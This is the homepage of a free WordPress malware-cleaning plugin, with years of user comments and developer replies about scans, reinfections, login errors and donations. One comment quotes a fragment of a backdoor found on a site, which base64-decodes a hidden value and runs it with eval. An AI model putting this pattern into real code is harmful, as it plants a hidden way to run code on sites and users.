Home

This Plugin was created to help WordPress admins clean infections off their site. It was inspired by my own need to to clean up one of my BlueHost accounts after a pretty bad hack (see How It All Started). It is still a little rough around the edges and I want to add many new and exciting features. It is currently being offered completely FREE of charge, though it did take quite a lot of time to develop, test, and make nice.

This project will continue to need my energy to keep it effectively getting rid of new threats and patching new vulnerabilities. That is why I am asking anyone who can, to please make a donation to keep it going.

Aloha,
Eli Scheetz

Testimonials

  • Your script saves our sites hours and hours of headaches! Please keep up the great work.

    With our thanks,
    EVERYONE!
    -- GertieBeth

403 Comments on "Home"

  • On December 6, 2017 at 4:09 am, Colin James said:

    Been using this on most sites I run for a number of years now. Have pretty tight security with iThemes Security Pro and Wordfence Pro. On the odd occasion something slips through and gotmls cleans up the mess. Ran into major problems today on a new site for a client. After panic stations gotmls sorted the problem out.
    A must have piece of kit for every website I build.
    Five stars+

    Reply
  • On November 28, 2017 at 10:18 pm, Stephane said:

    Hi,

    First, thanks a lot for your plugin.

    I launched a “complete scan” and right now, I just have the following information “Complete Scan of www started 20 hours ago and has not finish” without further indication of how much is actually done and/or how much is remaining to be done. I left the default settings : “Scan Depth -1″ and “skip files with the following extensions…”.

    How long can it take to complete a full scan ?
    Thank you.

    Best regards,
    Stephane.

    Reply
    • On November 29, 2017 at 6:34 pm, Anti-Malware Admin said:

      It sound like the Complete Scan was interrupted before it was able to finish. You have to stay on the scan results page as it runs the Complete Scan and then fix any Known Threats that it finds before you leave that page.

      Reply
  • On October 30, 2017 at 7:26 pm, scene king said:

    you are moderating and deleting my comments, not very professional

    Reply
    • On October 31, 2017 at 7:36 am, Anti-Malware Admin said:

      No, I’m not actually. I was just sleeping (most humans do that sometimes). When I woke up this morning and got to work I saw and replied to all your comments. Perhaps you should wait more than 5 hours and 6 minutes before jumping to conclusions like that.

      Anyway, If you are willing to give my plugin another try and send me some screenshots of the results you are getting then I am sure (with a little patience) you will find that my support is very professional (especially when you consider that the both the plugin and my support of the plugin are free).

      Reply
  • On October 30, 2017 at 7:25 pm, scene king said:

    does not have a way to remove the virus/malware

    skips alot of files

    i removed all exclusions, still skips files

    Reply
    • On October 31, 2017 at 7:28 am, Anti-Malware Admin said:

      What do you mean that there is no way to remove the malware? Does it find the Malware (there should be an automatic fix button)?

      I just replied to your other questions that you left on the Members page. I tried to update you account to use the core files definitions in the hopes that it would help you but it would appear that you are not using my plugin a ny more. You should try contacting me directly for more help as I don’t feel like you have provided me with enough info to really help you.

      Reply
  • On October 30, 2017 at 6:27 am, Giovanni said:

    Hi, I tried your plugin but did not find anything. The web site is infected as you can to verify with sucuri. Do I miss something in plugin settings?

    Thank you very much
    Gio’

    Reply
    • On October 30, 2017 at 7:09 am, Anti-Malware Admin said:

      It looks like the only thing that is still not fixed on your site is that the site Title has been changed to “Hacked By Pak Monster, etc., etc…”. You can change the Title of the site on the General Settings page of your wp-admin or you can check the header.php file under Appearance -> Editor. Please let me know where you find it.

      Reply
  • On October 28, 2017 at 6:31 pm, Emile said:

    Trying this wonderful tool, so far I love it. Will definitely donate as soon as my cleaning finishes.
    Just a recommendation, on each site I am running it, I have to manually delete .ico from the exclusion list (skip names)
    I am having endless threats shit in form of .ico named like favicon_239e5e.ico, favicon_dec111.ico, favicon_e69c66.ico
    So, maybe ICO don’t have to be in the skip by default.
    anyway, now I deleted ALL the skips and scanning even jpgs :) ))))
    I always wanted to be a carpenter

    Reply
    • On October 29, 2017 at 7:52 am, Anti-Malware Admin said:

      Thanks! I set the ICO and other image file type to be excluded by default because those file types cannot be executed directly by your server when they are called up in a browser, they are essentially harmless on their own. It take another PHP file with an include statement to invoke the malicious code in an image and so that is what my plugin looks for by default, effectively rendering the code in the image file useless. You can change those defaults as you have done and this will help you with a thorough cleanup but it will also take a long time to scan all the binary image files that are harmless, so it is not recommended by default.

      P.S. I too find a sense of joy and satisfaction in building stuff out of wood ;-)

      Reply
  • On October 23, 2017 at 4:14 pm, D said:

    Hello,
    Not sure if this is the right forum for this, but I have a question about an error I received when trying to log into my WP dashboard. The error is posted below:

    26934705: NO_JS

    You have been redirected here from [...] which is protected by GOTMLS Anti-Malware

    If you offer any guidance in identifying this error code, I’d appreciate it.

    Great software and thanks for putting together.

    Reply
    • On October 24, 2017 at 10:04 am, Anti-Malware Admin said:

      This error indicates that the additional security JavaScript that was added to your wp-login page was not working when you tried to login. When I checked your login page I could see tha the code is active and working for me. If you try it again and it’s still not working for then you should check your browser settings for popup blockers and make sure that there are no JavaScript error on the page.

      Reply
  • On October 18, 2017 at 8:56 pm, Jonathan said:

    thanks for great plugins..!!

    Reply
  • On October 13, 2017 at 1:33 am, abhi jeet said:

    we use your plugin to remove virus from WordPress but sucuri show Malicious code in our site.

    Reply
    • On October 13, 2017 at 9:01 am, Anti-Malware Admin said:

      Actually your site is now clean. Sucuri caches their scan results so you were seeing the old problem that had already been fixed by my plugin. At the bottom of their scan results page it said:
      *Cached results from more than 2 days ago. Force a Re-scan to clear the cache.

      So I clicked on the “Force a Re-scan” link and it came back clean.

      Reply
  • On October 12, 2017 at 8:14 pm, Camo said:

    Got to say buddy, this anti-malware plugin is a gem. Appriciate the efford. Will donate when I got a chance, as a student don’t have much to spare though.

    Reply
  • On September 14, 2017 at 9:52 am, siraj said:

    Hi, I just installed your plug in and did a quick scan and the result was 19 potential threats. But I can see the button fix the issue. can you help me with it please.

    Reply
    • On September 15, 2017 at 3:08 pm, Anti-Malware Admin said:

      First you need to register your key and download the latest Definition Updates. Then you can run the Complete Scan and the Automatic Fix button will show up if any Known Threats are found.

      Reply
  • On August 19, 2017 at 10:04 pm, Bala said:

    my wordpress website is throwing popup and redirecting to some irrelevant links when visiting my website. i think that this is some javascript malware attack. Is my assumption is right..?

    if yes. pls provide some advice…

    with thanks..
    Bala

    Reply
    • On August 20, 2017 at 9:13 pm, Anti-Malware Admin said:

      Yes, It’s probably malicious JavaScript output that is invoking this redirect, but the source might be encoded in a PHP script, if so then my plugin should find it. If it’s not in a PHP file or my plugin is not finding it then you could check the content of your pages and posts to see if the JavaScript was inserted there, You could also check for text widgets with JavaScript inserted into them,

      If you can’t find it then you can contact me directly through email for more support.

      Reply
  • On August 18, 2017 at 8:44 pm, Travis said:

    I have a new client who I’m scanning their server. It has been running for about 14 hours now, but it stopped counting time at 695 minutes. The activity at the top has kept moving, but it says “Re-Scanning …” and the Scanned Files count has not increased.
    They are using 1and1, so I understand why it is painfully slow, but I would like to see some progress.

    What would cause this, and is there a way I can get it to progress?

    Reply
    • On August 19, 2017 at 3:22 pm, Anti-Malware Admin said:

      It might be stuck in a loop trying to rescan all the folders that it has not gotten to yet. There may be a recursive symlink in the path or there are just too many subdirectories to get through them all before your server is timing out. You can check the error_log files on your server, they may hold some clues as to why the scan is getting stuck. You should also make sure there are no cache files in the path, that can make the scan take way too long and the cache files should be deleted anyway if you think the site might be infected. You could try scanning a smaller amount of file by only selecting certain subdirectories at a time (Click the folder names under “What to scan” and select one at a time per scan).

      You could also consider moving the site to a faster and more secure server ;-)

      Reply
      • On August 21, 2017 at 9:28 am, Travis said:

        Thank you. I let it run until just now (86 hours) and it got up to 97% complete, but it actually dropped the elapsed time to 521 minutes and the files scanned dropped significantly as well.

        I am doing as you suggested and scanning parts at a time, and I AM a faster and more secure server (beep boop, I’m a bot (j/k)) but this is a new client and I have not sold them on the move yet! :)

        Thanks for a fantastic product!

        Reply
  • On July 28, 2017 at 3:35 am, james gholson said:

    I hid my wordpress login with wordpress security and get this error message. How do I get help fixing this? Can you help? I am locked out…jg

    Warning: include(/homehdd/ggholson/public_html/wp-content/plugins/gotmls/safe-load/session.php): failed to open stream: No such file or directory in /homehdd/ggholson/public_html/wp-content/plugins/gotmls/safe-load/wp-login.php on line 17

    Reply
    • On July 28, 2017 at 12:24 pm, Anti-Malware Admin said:

      There seems to be files missing from the installation of the gotmls on your site. You should try deleting the whole gotmls folder in the plugins directory on your site, then you can reinstall and it should work fine.

      Reply
  • On July 22, 2017 at 1:43 pm, Simon C said:

    The scanner reports a backdoor alert from a sucuri file. This is a new client’s existing website, so I don’t know if he’s ever had a sucuri account. The file sits on the root and starts with sucuri- then a bunch of alphanumerics. Is this anything to be concerned with?

    BTW, I’ve already donated, but not through my account or the plugin. It’s from the same PP email I used to register.

    /* Encoded to avoid that it gets flagged by AV products or even ourselves :) */
    $tempb64 =
    base64_decode(
    $my_sucuri_encoding);

    eval( $tempb64
    );

    Reply
    • On July 22, 2017 at 3:35 pm, Anti-Malware Admin said:

      That code is not part of the sucuri plugin. It looks like something sucuri might have put on there if you hired them to fix your site but I can’t be sure. You can remove that code and it shouldn’t affect the functioning of your site.

      Reply
  • On June 13, 2017 at 2:38 am, Senkale said:

    I have just used your plugins and it was so amazing . I will soon make my own donation. keep up the good work

    Reply
  • On May 4, 2017 at 5:35 am, Rob Turner said:

    Hello,

    Seeing maldet hit that is causing sites with gotmls plugin to 500 error:

    FILE HIT LIST:
    {YARA}WebShell_Generic_PHP_5 : /home/victor40/public_html/wp-content/plugins/gotmls/images/index.php => /usr/local/maldetect/quarantine/index.php.1029613727

    I think maldet is quarantining it. Breakign the plugin and the site.

    This is a FYI notification.

    I am enabling using and then disabling the plugin each time I scan now.

    Thanks,
    Rob.

    Reply
    • On May 4, 2017 at 2:54 pm, Anti-Malware Admin said:

      This is a false positive that has already been fixed on both sides. You have an older version of my GOTMLS plugin and/or you have an outdated YARA definition file for maldet.

      Reply
  • On April 27, 2017 at 9:40 pm, Perth Home Cleaners said:

    Easy to use plugins. I found it very helpful and protective.

    Reply
  • On April 22, 2017 at 4:28 pm, Jalil Mehar said:

    Great Plugin I am going to donate next month.

    Reply
  • On March 30, 2017 at 4:36 am, Lohith said:

    Thanks for the awesome plugin. It serves good.

    I am regularly getting attack from malware I am always scanning and deleting them and even now scanning showing everything as fine but still google showing as site may hacked. Any solution for this.

    Reply
    • On March 30, 2017 at 6:56 am, Anti-Malware Admin said:

      After cleaning your site you need to login to Google Webmaster Tools and Request a Review to get your site off the blacklist so that warning will go away.

      Reply
  • On March 23, 2017 at 11:38 am, Adel Serag said:

    I just donated for the plugin, but I face a problem that after fixation of the threats either manually or automatically, they come back? and the website is still red assuming unsafe!!

    Reply
    • On March 23, 2017 at 12:07 pm, Anti-Malware Admin said:

      Thanks for the donation, everything look from my end, I see no infections now. If you run another scan does it find anything now?

      Reply
  • On March 9, 2017 at 8:39 pm, Tirlok Singh said:

    It’s a great plugin but the issue is that i run the scan and it has removed the malware but after sometime it is again infected. It is malware code can you help me . Do you have any definition for this malware ?

    Reply
    • On March 10, 2017 at 9:51 am, Anti-Malware Admin said:

      Ha, the hacker messed up on the first injection and the Hex code was not escaped properly, so the first part of that code does not even work as they had intended it to, they got it right the second time though. I have added this new bad hack to my definition updates so it can be completely removed now.

      The bigger issue for you is: How did they inject that malicious code into your site in the first place, and will they try to do it again?
      If your server still have the same vulnerability then you may still be susceptible to reinfection by this threat. Keep in mind that it may not even be your site that is vulnerable but possibly another compromised site on the same server that is spreading the infection to your site. If you are on a shared hosting plan then you should seriously consider changing hosting providers.How many site do you have on this host and do you have any other hosts you could easily move to?

      Reply
      • On March 14, 2017 at 7:24 am, Roger said:

        I’ve also been infected with this bad hex code injection, lot’s of .php files injected in the server (shared hosting with 42 sites right now). I think i need to step out this shared hosting thing (keeps giving problems). Why do hosters still aprove this?

        Reply
        • On March 14, 2017 at 2:38 pm, Anti-Malware Admin said:

          The typical shared hosting account is particularly susceptible to cross contamination, witch is what makes it such a target for hacker. I don’t know why the hosting providers don’t protect their clients more except that they usually benefit from the opportunity to up-sell you to one of their “more secure” hosting options, usually at some much greater price. I myself have created a Super Secure Hosting environment that solves this cross contamination issue. It is admittedly more costly than the shared hosting plans from the mega giants, but with my focused on security I have found a way to prevent this cross contamination threat. If you would like to migrate your sites to a new secure host then you can contact me directly and we can work on a hosting solution that meets your needs.

          Reply
  • On February 10, 2017 at 2:58 pm, Kate said:

    I did a scan with your plugin, then did “fix selected files”, and now…only my homepage exists. Everything else (my blog, my about page, etc) have gone to 404 Not Found Error. (Which is slightly better than the Canadian pharmacy, I guess.)

    Reply
    • On February 10, 2017 at 9:15 pm, Anti-Malware Admin said:

      Check your .htaccess file in the site root. The hack might have replaced the normal WordPress code, and now that the hack is gone there may not be anything there. You can go to the Permalink Settings in your wp-admin and save the setting on “Plain” and then change it back to “Post name” or whatever it was before, and that should rewrite your .htaccess file for you.

      Reply
  • On February 3, 2017 at 11:56 am, Sunny said:

    Any fix for the malware MW:JS:GEN2?malware.injection.rfcc2 the scan doesn’t find it, but the sucurti scan is showing 4 infected URLs with MW:JS:GEN2?malware.injection.rfcc2

    Reply
    • On February 3, 2017 at 3:36 pm, Anti-Malware Admin said:

      Sucuri caches their scan results. See the note at the bottom of their scan results page:
      *Cached results from 48 hrs ago.

      Just click the “Force a Re-scan” link to clear the cache ;-)

      Reply
  • On January 19, 2017 at 4:08 am, Varun Bansal said:

    How to delete all files from quarantine together? What is the SQL query. Can you please help ?

    Reply
  • On January 9, 2017 at 7:15 pm, parminder singh said:

    Great plugin, I want to know that is your plugin is same as sitelock.com, as there prices are too high i want to go with your plugin?

    Reply
    • On January 11, 2017 at 4:06 pm, Anti-Malware Admin said:

      In general I would say that there are all sorts of differences between the great many security programs out there, each one with it’s own strengths and weaknesses and having a wide range of quality and value to offer. I try not to say much about my opinions about other specific security software/providers and I would not like to be compared to Sitelock in any way, but I would have to agree with you that their prices are too high ;-)

      Anyway, the nice thing about my plugin is that you can try it for free and let me know what you think :-D

      Reply
  • On December 12, 2016 at 12:57 am, Marco L said:

    Hello. I just did a scan. I’ve fix all items.
    After 20 min, I have already found new malware folders and files in themes and root.
    How is it possible? I also did update with $ 14 donation. can you help me?

    Reply
    • On December 12, 2016 at 10:53 am, Anti-Malware Admin said:

      It is common to be targeted for automated re-infection once your site has been breached. The server may have a root vulnerability or a scheduled task that will cause your site to get reinfected on a regular basis. There may also be many other infected sites on that server that are spreading the infection around and helping to keep this virus alive on that server. Is this a shared hosting account? How many sites tdo you have on this server?

      Reply
      • On January 23, 2017 at 6:20 pm, Juan R said:

        HI, I have the same problem all my site are infected on Hostgator hosting 4 site total. any recommendations?

        Reply
        • On January 24, 2017 at 8:59 am, Anti-Malware Admin said:

          It sounds like you need to get your sites off of Hostgator and onto a server where they will not be reinfected any more. I offer Super Secure Hosting for this exact reason and your sites will not get reinfected on my servers.

          Reply
  • On December 9, 2016 at 7:15 am, Noavard said:

    Thanks for the really useful plugin, a tool that can protect us from very dangerous malwares.

    Reply
  • On November 1, 2016 at 3:17 pm, Edward Abraham said:

    Long time user, fantastic product. Thank you for putting so much effort into a tool that is free to use. I have donated and will continue to do so as is needed and as I build new sites for clients.

    Thank you again for the hard work and for sharing with the world!!! ALOHA!

    Reply
  • On October 26, 2016 at 4:55 am, Angela said:

    Hi is there a way to use your software for html website?

    Reply
    • On October 29, 2016 at 12:53 pm, Anti-Malware Admin said:

      Because it is designed as a plugin for WordPress it cannot currently be run directly on any site without WordPress installed. I have plans for a stand-alone version but it is not finished yet. I the mean time you can either install WordPress on that site of copy the files from that site into a subdirectory on another WordPress site to scan it.

      Reply
  • On October 21, 2016 at 10:22 am, john said:

    can you fix the error on line 1247 of gotmls/index.php

    die(“\n//Permission Error: User not authenticated!\nvar GOTMLS_login_offset = new Date();\nvar GOTMLS_login_offset_start = GOTMLS_login_offset.getTime() – “.$sess.”000;\nfunction set_offset_id() {\n\tGOTMLS_login_offset = new Date();\n\tif (form_login = document.getElementById(‘offset_id’))\n\t\tform_login.value = GOTMLS_login_offset.getTime() – GOTMLS_login_offset_start;\n\tsetTimeout(set_offset_id, 15673);\n}\nset_offset_id();”);

    Reply
    • On October 21, 2016 at 11:00 am, Anti-Malware Admin said:

      There is no error on that line or in the code you copied here. However, I did notice that this code on that line was from an older version of my plugin. Please upgrade to the newest version and then, if you are still getting an error, please send me a screenshot of the error you are seeing so that I can find the true source of that error.

      Reply
  • On October 17, 2016 at 4:01 am, Marathi Calendars said:

    Hello Support team,

    My site marathi-calendar.com redirects to redirectoffers.org and then some type of offers on mobile app.

    What should i do?

    Thanks

    Reply
    • On October 17, 2016 at 7:51 pm, Anti-Malware Admin said:

      Install my plugin, then register your installation key and download the latest definition updates, then run the complete scan and my plugin can automatically remove any Known Threats it finds.

      Reply
  • On September 17, 2016 at 6:01 am, Mike said:

    Getting the following message – Quick Scan of html started 12 hours ago and has not finish?

    The full scan timed out after about 10 seconds. I have over 1600 post, bunch of photos etc etc.. Any ideas?

    Reply
    • On September 17, 2016 at 11:03 am, Anti-Malware Admin said:

      It does not matter how many posts or photos you have, that will not make it take longer. Besides, the problem you are having is not that it’s taking a long time but rather that the scan is not finishing (maybe ever).

      Quick Scans only take a few minutes. If it’s not finished in a few minutes it’s not going to finish.

      As for the Complete Scan, I’m not sure what you mean by “timed out after about 10 seconds”. Can you send me a screenshot of that?

      It ma also help to check the error_log files on your server to see what is actually causing these problems you are having.

      Reply
    • On November 1, 2016 at 3:13 pm, Edward Abraham said:

      This could also be dependent on you hosting resources. jm2c

      Reply
  • On September 13, 2016 at 5:11 am, Subesh Gupta said:

    Hi , Just download your plugin. I just found my malware script here. but how to remove it from my website it. Its been affected all of my .php files and published. So google gives me RED warning. Please HELP HELP HELP

    Reply
    • On September 14, 2016 at 11:56 am, Anti-Malware Admin said:

      Make sure you have the latest definition updates, then you can simply click the Automatic Fix button to remove the malicious code from those files.

      After you have a clean site you will need to “Request a Review” from your Google Webmaster Tools account so that google will remove that warning.

      Reply
  • On September 3, 2016 at 10:35 am, ano said:

    how can I revoke whitelisted items?

    Reply
    • On September 3, 2016 at 5:37 pm, Anti-Malware Admin said:

      remove the “GOTMLS_definitions_array” row from the wp-options table and download the latest definition updates again.

      Reply
  • On August 6, 2016 at 4:07 am, Andreas said:

    I used your plugin for a site that I was told has malware on. found it and removed it. I loved it right from there.

    I would love to install this on all my sites and clients site. is there a volume deal/lic I can buy so I can use

    Reply
    • On August 8, 2016 at 2:30 pm, Anti-Malware Admin said:

      Just use the same email address when registering all the other sites and they will all be under the same account. Donate as much as you would like on site that is registered to that account and you donation will be reflected on all those sites ;-)

      Reply
      • On August 10, 2016 at 5:44 am, Andreas Pastor said:

        OK all done. One last question. Is there any plans to have this run automatically and sent out an email if anything is found?

        Reply
  • On August 4, 2016 at 8:37 am, Tom Thayer said:

    Just donated. Keep up the great work. :)

    Reply
  • On July 9, 2016 at 4:43 am, kerry banz said:

    Hello,
    I just downloaded your plug. I ran the scan and a threat was identified in Read/Write Errors. There was no repair button with the link it identified when I hover over the link I get a message “failed to read this file! (readable? Eww-r–r-r–]). Since I am a novice at this (or anything that falls under IT/programing), I was wondering if you could let me know what I need to do next.
    My email has been spoofed and I am receiving up to 100 “undeliverable” email messages an hour. I was able to figure out that the spoofer used my shared server to get to me…and yes, I have now been educated on why not to use a shared server (and will be rectifying the issue as soon as I can get the “undeliverable” email notifications to STOP!!

    Thank you,
    Kerry

    Reply
    • On July 9, 2016 at 9:55 am, Anti-Malware Admin said:

      Read/Write errors, by definition, cannot be fixed automatically. Those are files that my plugin could not read or write to, therefore my plugin cannot fix them for you. It does not mean that those files are malicious but you will need to investigate and fix the permissions manually (with escalated permission because anything running under PHP, like my plugin, will not have the necessary access).

      Reply
  • On June 23, 2016 at 11:56 am, Darko Zoric said:

    I recommended this plugin to all wordpress admins.. I installed this plugin and find malware scripts in Potential Threats .. My malwares is for sending automatic emails and all scripts is with extension .php … So i suggest you all to open files in Potential Threats and check all.. Again, great plugin, Thanks

    Reply
    • On June 23, 2016 at 3:59 pm, Anti-Malware Admin said:

      Thanks for great recommendation!

      Also, if you will send me those Potential Threats that you found malicious code in then I can add them to the Known Threats in my next definition update so that they can be automatically removed.

      Reply
  • On June 23, 2016 at 6:38 am, Primoz Kvaternik said:

    Eli,
    I have a serious problem. I am under constant attack for 2 of my blogs where I have installed your plugin. The point is that today Google blacklisted both of my blogs because of malware… I’ve got the following message “Warning – visiting this website may harm your computer!” and from Google search you simply cannot access these sites.

    I am asking you do you have any solution for that, because as soon as I clean the site using your plugin at once after some time, maybe even hours it is affected again. As Google needs 24 hours to put site back again it will be again affected and it is practically dead.
    PLEASE ADVISE!
    Primoz

    Reply
    • On June 23, 2016 at 7:30 am, Anti-Malware Admin said:

      Your sites are clearly not safe on the server you are current hosting them on. In order to keep them from getting reinfected by this same exploit you may need to move them to a more secure hosting environment. I do offer Super Secure Hosting for situation such as this. You can sign-up for my hosting here if you need a place to host your sites that is safe from these hacks:
      https://supersecurehosting.com/signup/

      Reply
  • On June 3, 2016 at 4:12 pm, RK1 said:

    Hi – great plugin. I’m getting this message in the admin window. Can you please tell me what this means?

    “Another Plugin or Theme is using ‘Bot_ContentGenerator::addLinks’ to handle output buffers.
    This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins.
    Consider disabling caching and compression plugins (at least during the scanning process).”

    Reply
    • On June 8, 2016 at 5:23 pm, Anti-Malware Admin said:

      That message means that there is some code on your site that is invoking an output buffer handler which can alter the content that is displayed on your site. It is difficult to detect exactly where that code is included but my plugin should find it if you run Complete Scan with the latest definition updates installed.

      Reply
  • On May 31, 2016 at 4:24 am, JK said:

    Question: This plugin is simply great and cleaned up all malicious codes. How do we prevent future attacks from happening? Let me know.

    Thanks.

    Reply
  • On May 6, 2016 at 5:31 am, Kenneth Black ken@socialsaleshq.com said:

    What do we do with Potential threats ? How do we delete these and get rid of these threats ?

    Reply
    • On May 6, 2016 at 11:47 am, Anti-Malware Admin said:

      As the notice on those results states: Those files are likely not malicious at all. So you don’t need to do anything with them. That’s why my plugin does not automatically fix them. However, if your site is still infected and there are no Known Threats (in red), then you may want to have a professional take a look at those files first to see it the infection might be in those somewhere.

      Reply
  • On May 3, 2016 at 2:52 am, Panduranga Reddy said:

    Excellent work!

    Reply
  • On April 28, 2016 at 3:17 am, daniel said:

    Hello

    I want know if possible run the script in other CMS , Drupal for example or only php web sites.

    Thanks a lot for your hard work !

    Reply
    • On May 9, 2016 at 1:18 pm, Anti-Malware Admin said:

      I’m sorry but this is only a WordPress plugin at the moment. I am working on a Command-Line version but it is not ready for release yet.

      Reply
      • On December 22, 2016 at 2:59 pm, Matteo said:

        Great! I wait for the day that it will be ready! Yours is the best anti-malaware that I ever seen in my life, wow! Webservers should use it too, not mcafee for example..

        Reply
  • On April 27, 2016 at 8:31 am, Brian Dean said:

    So for $29 donation you think your plugin should find and clean SEO Malware as well as HTML: HideMe-l [Trj]?
    These seem to be the two I’m having issues removing.

    Thanks!
    Let me know and I’ll pay now.

    Reply
    • On April 27, 2016 at 1:19 pm, Anti-Malware Admin said:

      My plugin should find and clean all those malware infections if you have the latest definition updates, even if you do not donate. However, if you do donate at the $29+ level then you can use the Automatic Updates to install the Core Files definitions and that should make the scan and fix process faster, more accurate, and more effective overall.

      Please feel free to contact me directly with more specific info about your site and your infection if my plugin is not finding it for you.

      Reply
  • On April 15, 2016 at 2:02 am, Jim said:

    Hi,

    This plugin sounds great. but to upgrade to the premium, how much does it cost and what is that donate button, what if the different?

    In general, donate is up to us how much to give, upgrade premium is a set price, no where to be find?

    Very confusing??? Please explain how it go and work? Thanks

    Reply
    • On April 15, 2016 at 3:38 pm, Anti-Malware Admin said:

      There are different feature available at different levels of donations (explained in red next to locked features). You should feel free to donate as much or as little as you want, but basically everything is unlocked at the $29+ level for as many domains as you want ;-)

      Reply
  • On April 11, 2016 at 7:05 am, Robin said:

    I received a message from my hosting that my site had been infiltrated by phishing malware. I tried to run a “Core Scan”, but at 31% it had found a backdoor script but stopped scanning. A pop-up indicated that there was either not enough memory or something else was preventing the scan from completing. The pop-up instructed me to use the “complete scan” feature to scan the site. In so doing the “complete scan” completed 100% but found no malware. How is this possible when the core scan resulted in at least one issue? I have been asked to close my site for maintenance until this issue is resolved. Google Safe Browsing Diagnostic is indicating that my site is “Partially Dangerous”. I sent an email to eli AT gotmls DOT net regarding this issue, and received no response. Please acknowledge and advise. Thank you

    Reply
    • On April 12, 2016 at 11:26 am, Anti-Malware Admin said:

      I replied to your direct email 7 days ago, right after you sent it, please check your spam folder.

      Did you Fix the Back-door that was found when you ran the Core File Scan? It does not need to reach 100% for you to Fix the problems that it finds. I don’t know of any reason why the Complete Scan would find less than the Quick Scan unless you already fixed that threat or if you are only running the Complete Scan on the plugins and the prior threat was not found in the plugins at all.

      Please try the Complete Scan on the whole site, look for any problems, and let me know what you find.

      Reply
  • On March 29, 2016 at 3:08 am, Primož Kvaternk said:

    I have installed on 2 of my blogs your anti-malware software which is great. But I have special problem, that intruders put malicious code on a regular basis and I need all the time cleaning my blogs. Do you intend to create a scheduled software triggering?

    Thanks for your reply, Primoz

    Reply
    • On March 29, 2016 at 3:20 pm, Anti-Malware Admin said:

      Yes, I am currently working on a script that can be executed from the command line and scheduled in your crontab.

      I will make a big announcement when this capability is available as it is a much requested feature.

      Reply
  • On March 23, 2016 at 10:13 pm, Михаил Беляев said:

    Спасибо за скрипт !! Очень помог !! Успехов в развитии.

    Reply
  • On March 23, 2016 at 12:43 am, Arno said:

    Hello,
    Your WP plugin is really great.
    It solved a brute forece attack problem I have since month at one of my clients WP blog.

    Is it possible to donate a amout of money via paypal to have a multisite license ?

    Regards.
    Arno

    Reply
    • On March 23, 2016 at 7:12 pm, Anti-Malware Admin said:

      You can run my plugin on multi site or on as many individual WordPress installs as you want, and if you register each site with the same email address then your donation will count for all of your sites :-)

      Reply
  • On March 22, 2016 at 5:34 am, Test Site said:

    Installed the plugin to remove a hack from a test site on a subdomain that we were using. But now I can’t login to my regular WordPress site. I need to either remove the plugin OR figured out how to get around this error message:
    44360641

    You have been redirected here from (website) which is protected against brute-force attacks by GOTMLS.NET

    Please help.

    Reply
    • On March 22, 2016 at 7:29 am, Anti-Malware Admin said:

      This is caused by a JavaScript error on your wp-login page. The Events Calendar plugin on your site it throwing a warning and because your server is set to output warning it is breaking my JavaScript output.
      On line 49 of …/wp-content/plugins/the-events-calendar/common/src/Tribe/Admin/Notice/Archive_Slug_Conflict.php the error is:
      “in_array() expects parameter 2 to be array, boolean given”

      To fix this problem you can either deactivate that Events Calendar plugin or fix the code in that plugin or disable the displaying of PHP warnings in your server’s php.ini file.

      Please let me know if I can be of any further assistance in this matter.

      Reply
  • On March 16, 2016 at 6:16 pm, David Smith said:

    I have made a 14 dollar donation can I run auto repair or do I have to pay another 29 this is for a carity website that has been hacked?

    Reply
    • On March 17, 2016 at 8:41 am, Anti-Malware Admin said:

      Thanks for your donation, but my plugin will remove know threats and back-door scripts (in red) even if you do not make a donation.

      If you are asking about potential threat (in yellow), these will never be removed automatically because they are likely not malicious at all.

      If you have any more questions or need any more help please send me a screenshot so I know what you are dealing with.

      Reply
  • On February 11, 2016 at 2:01 am, shamiraz k said:

    very nice
    i love to use this in sites as i am new i haven’t use this before
    really awesome work by you guys keep it up

    Reply
  • On January 24, 2016 at 1:30 am, Katherine Martin said:

    This is a God send!! Thanks so much!

    Reply
  • On January 14, 2016 at 5:50 pm, David Norwood said:

    awesome! thanks so much..im worried that the issue may be bigger than I thought as I did a google search for the website and see pages that may have been created by hacker, which is causing the website to be flagged..any suggestions on what action I should take?

    Reply
  • On January 14, 2016 at 5:24 pm, David Norwood said:

    hi there! I recently signed up for my website, and I love this! However, I got a key and used it on here to sign up and register, but when I log in to wordpress, the right bar says “No key!” also, is the scan actually working??

    - David

    Reply
    • On January 14, 2016 at 5:40 pm, Anti-Malware Admin said:

      Use the “Get FREE Key” button on the right site of the Anti-Malware Settings page in your wp-admin. Then you the form provided to register the pre-filled key if it prompts you to, and then download the latest definition updates.

      Then you can start a Complete Scan to find and remove any Known Threats ;-)

      Reply
  • On January 14, 2016 at 11:08 am, Tolly said:

    Thanks for the wonderful plugin. I have one quick question tho.
    The plugin constancy keeps changing my PHP back to 5.2 whenever I update to 5.4.
    It might also be changing my htaccess too.

    Thanks.

    Reply
    • On January 14, 2016 at 11:33 am, Anti-Malware Admin said:

      Thank you but it couldn’t possibly be my plugin that is changing your PHP version. Also, it only changes the .htaccess file when you click on the XMLRPC patch and then it only adds a Directive and doesn’t change anything else in that file. It must be something else that is messing with your PHP settings.

      Reply
  • On January 9, 2016 at 1:27 am, DebLiz said:

    Just….. God bless you. Seriously. You’re the best thing that’s ever happened to me in 6 years of working with WordPress!

    I haven’t donated yet because I just don’t have the funds, but I promise you as SOON as I get paid for my latest project, I’ll be donating just as much as I can.

    I’ve been in tears over my server being completely inundated with malicious stuff – it’s been awful. I lost most of my portfolio websites and had to just delete most everything. Luckily I was able to get to the admin dashboard for the important sites and I’ve been just praying for a solution…

    I’m currently scanning my site, debliz.com and so far (at 37%) your plugin has detected and fixed one htaccess treat, SIX backdoor scripts, and almost SEVENTY “known threats”!!! I KNEW it was bad… but my gosh!

    There’s also 23 “potential threats” … I’m not sure what to do with them – but I’m tempted to just let your plugin ‘fix’ them without even checking into them. I’m so unbelievably grateful to you for all of your hard work.

    You may very well have saved my entire web business. I cannot express to you how grateful I am. And I’ll show my appreciation monetarily as soon as I possibly can. THANK you so much again!

    D

    Reply
    • On January 11, 2016 at 3:41 pm, Anti-Malware Admin said:

      Thanks for your kind words and I see that you donated so thanks for that too ;-)

      The Potential Threats are usually not malicious so my plugin doesn’t fix them automatically but if you are still finding malicious content on your site after the auto-fix of the Known Threats then you can click through these potential threats to view the suspect code and decide if it’s something you want to remove or if it looks safe you can leave it there. You can also send any Potential Threats to me directly and I will let you know what I think.

      Reply
  • On December 22, 2015 at 2:14 am, Rob Edmunds said:

    Hi,

    Have a clients site that has been hacked and possibly a few more, would like to register and pay a donation for use on multiple sites – is this possible??

    thanks,

    rob.

    Reply
